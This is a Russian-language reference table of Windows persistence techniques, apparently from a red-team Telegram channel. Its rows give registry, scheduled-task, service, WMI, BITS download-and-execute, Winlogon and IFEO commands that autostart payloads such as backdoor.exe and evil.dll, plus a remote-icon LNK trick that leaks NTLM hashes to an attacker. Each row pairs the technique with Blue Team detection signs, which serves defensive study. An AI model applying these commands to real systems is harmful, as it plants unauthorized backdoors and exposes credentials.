Windows Persistence

t.me/in51d3

Категория	Техника	Что делаем	Как запускается при старте / логине	Инструменты / Команда	Признаки для Blue Team
Автозапуск в реестре	Run / RunOnce	Создаём строку `HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run` → `payload.exe`	Каждый вход пользователя	`reg add ... /v MyPayload /d "C:\\temp\\svc.exe" /f`	Новая строка в Run; 4688 процесс от имени пользователя при логине
Scheduled Task	Hidden Task	`schtasks /create` с флагом `/ru SYSTEM` и триггером `ONLOGON`	Task Scheduler вызывает `cmd.exe /c payload.ps1`	`schtasks /create /sc onlogon /tn UpdTask /tr ... /ru SYSTEM`	Журнал Microsoft-Windows-TaskScheduler/Operational, Event 106, скрытый task XML
Служба (Service)	New Service + svchost	`sc create WinUpd type=own start=auto binPath=...`	Запускается как SYSTEM на boot	`sc create`, `sc config`, `Start-Service`	7045 (Service Installed), 4697 Sysmon Event 4
WMI Event Sub	__EventFilter + __EventConsumer + Binding	Создаём EventFilter на `Win32_Logon`, Consumer запускает `powershell`	WMI реагирует на событие	`powershell Invoke-WmiMethod` or wmi-persistence.ps1	Sysmon Event 20, WMI-Activity 5858, 5861
Startup Folder	LNK в `%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup`	Копируем ярлык `update.lnk` → `payload.exe`	Explorer грузит ярлыки при логине	`copy payload.lnk %startup%`	Новый файл .lnk, 4688 процесс при логине
Winlogon Helper	Userinit / Shell hijack	Изменяем `HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon` `Userinit` → `userinit.exe, backdoor.exe`	Запускается при интерактивном логине	`reg add ... /v Userinit /d "userinit.exe, back.exe" /f`	Изменённые строки в Winlogon, 4688 process SYSTEM
Image File Execution Options	IFEO Debugger	`HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\util.exe` → `Debugger=payload.exe`	Когда жертва запускает util.exe, запускается payload	`reg add ...IFEO\\calc.exe /v Debugger /d "C:\\p\\rev.exe"`	Запуск подозрительного exe вместо calc.exe; Sysmon Event 1 path mismatch
AppInit DLLs	Global DLL injection	`HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\AppInit_DLLs` → `evil.dll`	DLL внедряется в каждый процесс, использующий User32	`reg add ... /v AppInit_DLLs /d "C:\\evil.dll" /t REG_SZ /f`	ETW ImageLoad; Antivirus alerts; unusual AppInit entries
BITS Jobs	Background Intelligent Transfer	`bitsadmin /create` job, add file download & exec	BITS выполняет задачу в idle	`bitsadmin /transfer myjob ...`	BITS event log 164; Network traffic to C2
Logon Script (GPO)	User/Computer logon	Изменяем `\\domain\\SYSVOL\\scripts\\logon.bat`	GPO вызывает скрипт каждую авторизацию	`net use` / modify GPO; AD event 4739	Sysvol file hash change; Script content diff
Registry Shell Extensions	CLSID Hijack	Добавляем `HKCU\\Software\\Classes\\Directory\\Background\\shell\\Open\\command`	Выполняется при Open explorer command	`reg add ... /d "payload.exe"`	Shellbag anomalies, Sysmon 7
LNK + IconLoad	IconPath Remote	LNK указывает на `\\server\\share\\icon.ico`	Windows запросит и подмонтирует SMB path → NTLM hash leak	Craft LNK with remote icon via SharpShortcut	SMB auth attempts to attacker IP
Persistence via ETW	Event Tracing Provider	Install provider → callback DLL	Provider активируется по ETW session	EtwInstaller project	ETW registry provider keys, unexplained DLL loads